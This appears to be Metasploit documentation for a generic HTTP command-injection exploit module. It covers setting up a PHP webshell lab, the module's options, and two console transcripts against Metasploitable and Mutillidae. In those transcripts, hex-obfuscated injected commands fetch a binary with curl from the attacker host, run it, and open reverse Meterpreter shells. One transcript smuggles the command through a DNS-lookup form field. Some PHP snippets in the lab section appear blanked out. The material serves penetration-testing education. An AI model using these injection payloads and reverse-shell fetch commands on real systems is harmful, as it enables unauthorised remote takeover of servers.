## Vulnerable Application This module is for any generic HTTP command execution where user-supplied input is directly passed to system execution functions via a HTTP request. As a result, able to use: - Any web command execution vulnerability _(think hardware devices having ping/traceroute functions)_ - Any lab target, which have a "command execution" module. - Such as [DVWA](https://github.com/digininja/DVWA) or [Mutillidae](https://github.com/webpwnized/mutillidae) - Included with [Metasploitable](https://docs.rapid7.com/metasploit/metasploitable-2/) - Alternatively, simulate with one of the following PHP code snippets (for a basic webshell): - `` - `` - `` - `` - `` - `````` This is similar to `exploits/unix/webapp/php_eval`, except it isn't limited to PHP’s code execution, but can use any OS command execution function. - - - Setting up a quick PHP test lab on a Debian-base host: ```console $ sudo apt-get install --yes apache2 php curl [...] $ $ sudo systemctl start apache2 $ $ echo '' | sudo tee /var/www/html/shell.php $ $ curl localhost/shell.php?cmd=id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ ``` ## Verification Steps 1. Setup lab, or find a web command execution vulnerability 1. Start `msfconsole` 1. Do: `use exploits/multi/http/os_cmd_exec` 1. Do: Set `RHOSTS` and `URIPATH` (`HEADERS` and `POSTDATA` are optional, depending on vulnerability). May also want to customize the payload and `LHOST` if desired 1. Do: `run` 1. You should get a shell ## Options ### `HEADERS` Any additional HTTP headers to send, cookies for example. Format: `header:value,header2:value2`. ### `POSTDATA` Any HTTP POST method request data to send, with the command injection placeholder set to `!INJECT!`. If this value is blank, will be a HTTP GET method request. ### `Proxies` A proxy chain of format: `type:host:port[,type:host:port][...]`. Supported proxies: `sapni`, `socks4`, `socks5`, `socks5h`, `http` ### `RHOSTS` The target host(s), see: https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html ### `RPORT` The target port (TCP). Default: `80` ### `SSL` Negotiate SSL/TLS for outgoing connections. Default: `false` ### `URIPATH` The URI to request, with the command injection placeholder set to `!INJECT!`. Default: `/ping/?cmd=!INJECT!` ### `VHOST` HTTP server virtual host. ## Scenarios ### Example PHP Lab ```console msfadmin@metasploitable:~$ echo '' | sudo tee /var/www/shell.php msfadmin@metasploitable:~$ curl localhost/shell.php?cmd=id uid=33(www-data) gid=33(www-data) groups=33(www-data) msfadmin@metasploitable:~$ msf exploit(multi/http/os_cmd_exec) > options Module options (exploit/multi/http/os_cmd_exec): Name Current Setting Required Description ---- --------------- -------- ----------- HEADERS no Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2" POSTDATA no POST data to send, with the eval()'d parameter changed to !INJECT!. Otherwise will be a GET request. Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, http, socks5h, sapni, socks4 RHOSTS 10.0.0.10 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections URIPATH /shell.php?cmd=!INJECT! yes The URI to request, with the eval()'d parameter changed to !INJECT!", "/ping/?cmd=!INJECT! VHOST no HTTP server virtual host Payload options (cmd/linux/http/x86/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) FETCH_DELETE false yes Attempt to delete the binary after execution FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash, zsh) (Accepted: none, python3.8+, shell-search, shell) FETCH_SRVHOST no Local IP to use for serving payload FETCH_SRVPORT 8080 yes Local port to use for serving payload FETCH_URIPATH no Local URI to use for serving payload LHOST tap0 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port When FETCH_COMMAND is one of CURL,GET,WGET: Name Current Setting Required Description ---- --------------- -------- ----------- FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. When FETCH_FILELESS is none: Name Current Setting Required Description ---- --------------- -------- ----------- FETCH_FILENAME mANdNVqs no Name to use on remote system when storing payload; cannot contain spaces or slashes FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces Exploit target: Id Name -- ---- 0 Linux View the full module info with the info, or info -d command. msf exploit(multi/http/os_cmd_exec) > check [*] Sending GET request: http://10.0.0.10:80/shell.php?cmd=echo%20lKPACzWGh0CD9fjQh2HJAPzO [+] 10.0.0.10:80 - The target is vulnerable. msf exploit(multi/http/os_cmd_exec) > run [*] Started reverse TCP handler on 10.0.0.1:4444 [*] Sending GET request: http://10.0.0.10:80/shell.php?cmd=/bin/echo%20-ne%20%27\x63\x75\x72\x6c\x20\x2d\x73\x6f\x20\x2e\x2f\x72\x75\x65\x47\x78\x54\x71\x70\x6f\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x30\x2e\x30\x2e\x30\x2e\x31\x3a\x38\x30\x38\x30\x2f\x77\x34\x66\x47\x56\x67\x58\x69\x4b\x48\x53\x75\x5a\x4a\x31\x64\x6a\x54\x77\x65\x47\x77\x3b\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2e\x2f\x72\x75\x65\x47\x78\x54\x71\x70\x6f\x3b\x2e\x2f\x72\x75\x65\x47\x78\x54\x71\x70\x6f\x26%27%7csh [*] Sending stage (1062760 bytes) to 10.0.0.10 [*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:46267) at 2026-03-14 20:35:06 +0000 meterpreter > getuid Server username: www-data meterpreter > sysinfo Computer : metasploitable.localdomain OS : Ubuntu 8.04 (Linux 2.6.24-16-server) Architecture : i686 BuildTuple : i486-linux-musl Meterpreter : x86/linux meterpreter > ``` ### Mutillidae This is on Metasploitable 2 VM: ```console msf > use exploits/multi/http/os_cmd_exec [*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp msf exploit(multi/http/os_cmd_exec) > set PAYLOAD cmd/linux/http/x86/meterpreter/reverse_tcp PAYLOAD => cmd/linux/http/x86/meterpreter/reverse_tcp msf exploit(multi/http/os_cmd_exec) > set RHOSTS 10.0.0.10 RHOSTS => 10.0.0.10 msf exploit(multi/http/os_cmd_exec) > set LHOST tap0 LHOST => tap0 msf exploit(multi/http/os_cmd_exec) > set URIPATH /mutillidae/index.php?page=dns-lookup.php URIPATH => /mutillidae/index.php?page=dns-lookup.php msf exploit(multi/http/os_cmd_exec) > set POSTDATA "target_host=;!INJECT!&dns-lookup-php-submit-button=Lookup+DNS" POSTDATA => target_host=;!INJECT!&dns-lookup-php-submit-button=Lookup+DNS msf exploit(multi/http/os_cmd_exec) > msf exploit(multi/http/os_cmd_exec) > options Module options (exploit/multi/http/os_cmd_exec): Name Current Setting Required Description ---- --------------- -------- ----------- HEADERS no Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2" POSTDATA target_host=;!INJECT!&dns-lookup-php-submit-button=Lookup+DNS no POST data to send, with the eval()'d parameter changed to !INJECT!. Otherwise will be a GET request. Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http RHOSTS 10.0.0.10 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections URIPATH /mutillidae/index.php?page=dns-lookup.php yes The URI to request, with the eval()'d parameter changed to !INJECT!", "/ping/?cmd=!INJECT! VHOST no HTTP server virtual host Payload options (cmd/linux/http/x86/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) FETCH_DELETE false yes Attempt to delete the binary after execution FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash, zsh) (Accepted: none, python3.8+, shell-search, shell) FETCH_SRVHOST no Local IP to use for serving payload FETCH_SRVPORT 8080 yes Local port to use for serving payload FETCH_URIPATH no Local URI to use for serving payload LHOST tap0 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port When FETCH_COMMAND is one of CURL,GET,WGET: Name Current Setting Required Description ---- --------------- -------- ----------- FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. When FETCH_FILELESS is none: Name Current Setting Required Description ---- --------------- -------- ----------- FETCH_FILENAME SYonhqJf no Name to use on remote system when storing payload; cannot contain spaces or slashes FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces Exploit target: Id Name -- ---- 0 Linux View the full module info with the info, or info -d command. msf exploit(multi/http/os_cmd_exec) > check [*] Sending POST request: http://10.0.0.10:80/mutillidae/index.php?page=dns-lookup.php -> target_host=;echo%203uCamYlgMAEsiPoIGU6cWjjQIgzI&dns-lookup-php-submit-button=Lookup+DNS [+] 10.0.0.10:80 - The target is vulnerable. msf exploit(multi/http/os_cmd_exec) > run [*] Started reverse TCP handler on 10.0.0.1:4444 [*] Sending POST request: http://10.0.0.10:80/mutillidae/index.php?page=dns-lookup.php -> target_host=;/bin/echo -ne '\x63\x75\x72\x6c\x20\x2d\x73\x6f\x20\x2e\x2f\x7a\x42\x6a\x79\x74\x73\x7a\x6f\x6a\x44\x72\x6c\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x30\x2e\x30\x2e\x30\x2e\x31\x3a\x38\x30\x38\x30\x2f\x77\x34\x66\x47\x56\x67\x58\x69\x4b\x48\x53\x75\x5a\x4a\x31\x64\x6a\x54\x77\x65\x47\x77\x3b\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2e\x2f\x7a\x42\x6a\x79\x74\x73\x7a\x6f\x6a\x44\x72\x6c\x3b\x2e\x2f\x7a\x42\x6a\x79\x74\x73\x7a\x6f\x6a\x44\x72\x6c\x26'|sh&dns-lookup-php-submit-button=Lookup+DNS [*] Sending stage (1062760 bytes) to 10.0.0.10 [*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:45260) at 2026-03-14 07:32:49 +0000 meterpreter > getuid Server username: www-data meterpreter > sysinfo Computer : metasploitable.localdomain OS : Ubuntu 8.04 (Linux 2.6.24-16-server) Architecture : i686 BuildTuple : i486-linux-musl Meterpreter : x86/linux meterpreter > ```